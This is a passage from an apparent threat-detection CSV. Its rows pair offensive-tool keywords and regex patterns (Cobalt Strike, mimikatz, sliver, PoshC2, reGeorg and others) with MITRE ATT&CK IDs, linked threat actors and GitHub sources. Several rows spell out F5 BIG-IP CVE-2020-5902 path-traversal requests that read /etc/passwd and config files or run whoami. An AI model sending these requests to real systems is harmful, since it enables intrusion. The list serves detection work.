Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45579" "*generate_unmanaged_exe operation1 *.exe",".{0,1000}generate_unmanaged_exe\soperation1\s.{0,1000}\.exe","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45580" "*generate_x64_shellcode*",".{0,1000}generate_x64_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45581" "*generate_x86_shellcode*",".{0,1000}generate_x86_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45582" "*Generated random password for socks proxy:*",".{0,1000}Generated\srandom\spassword\sfor\ssocks\sproxy\:.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","45583" "*Generated shellcode successfully saved in file *",".{0,1000}Generated\sshellcode\ssuccessfully\ssaved\sin\sfile\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","45584" "*GenerateDllBase64Hta*",".{0,1000}GenerateDllBase64Hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45585" "*GenerateExeBase64*",".{0,1000}GenerateExeBase64.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - 
T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45586" "*GenerateForcedBrowseWordlist.py*",".{0,1000}GenerateForcedBrowseWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","45587" "*generateInjectBinFile*",".{0,1000}generateInjectBinFile.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45588" "*Generate-Macro.ps1*",".{0,1000}Generate\-Macro\.ps1.{0,1000}","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","N/A","7","677","210","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z","45589" "*GenerateParameterWordlist.py*",".{0,1000}GenerateParameterWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite - Extracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","45590" "*GenerateReverseTcpDrone*",".{0,1000}GenerateReverseTcpDrone.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","45591" "*generate-rotating-beacon.*",".{0,1000}generate\-rotating\-beacon\..{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","45592" "*GeneratesShellcodeFromPEorDll*",".{0,1000}GeneratesShellcodeFromPEorDll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","45593" "*Generating sliver binary for *",".{0,1000}Generating\ssliver\sbinary\sfor\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45594" "*Generating x64 meterpreter shell*",".{0,1000}Generating\sx64\smeterpreter\sshell.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","45595" "*Generating x86 meterpreter shell*",".{0,1000}Generating\sx86\smeterpreter\sshell.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","45596" "*Generator IP@Login;Password*",".{0,1000}Generator\sIP\@Login\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","45597" "*GenericC2Relay.cs*",".{0,1000}GenericC2Relay\.cs.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","45601" "*Genetic-Malware/Ebowla*",".{0,1000}Genetic\-Malware\/Ebowla.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 
- T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","45602" "*genMalDoc()*",".{0,1000}genMalDoc\(\).{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","45604" "*genmkvpwd *",".{0,1000}genmkvpwd\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45605" "*gentilkiwi (Benjamin DELPY)*",".{0,1000}gentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","45606" "*gentilkiwi*",".{0,1000}gentilkiwi.{0,1000}","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - 
OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45607" "*Georg is not ready, please check url*",".{0,1000}Georg\sis\snot\sready,\splease\scheck\surl.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","45609" "*Georg says, 'All seems fine'*",".{0,1000}Georg\ssays,\s\'All\sseems\sfine\'.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","45610" "*GeorgePatsias/ScareCrow*",".{0,1000}GeorgePatsias\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads integration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","45611" "*georgesotiriadis/Chimera*",".{0,1000}georgesotiriadis\/Chimera.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","45612" "*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*",".{0,1000}geowordlists\s\-\-postal\-code\s75001\s\-\-kilometers\s25\s\-\-output\-file\s\/tmp\/around_paris\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45613" "*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*",".{0,1000}GET\s.{0,1000}\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/hosts.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45615" "*GET */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.conf.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45616" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.license.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45617" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45618" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45619" "*GET *https://*/tmui/login.jsp/.. 
/tmui/locallb/workspace/tmshCmd.jsp?command=whoami*",".{0,1000}GET\s.{0,1000}https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=whoami.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45620" "*get_beacon(*",".{0,1000}get_beacon\(.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45621" "*get_BeaconHealthCheck_settings*",".{0,1000}get_BeaconHealthCheck_settings.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker 
- DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","45622" "*get_c2_messages*",".{0,1000}get_c2_messages.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45623" "*get_c2server_all*",".{0,1000}get_c2server_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - 
TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45624" "*get_cmd_from_task_id*",".{0,1000}get_cmd_from_task_id.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45625" "*get_csexecsvc_net35*",".{0,1000}get_csexecsvc_net35.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45626" "*get_csexecsvc_net40*",".{0,1000}get_csexecsvc_net40.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - 
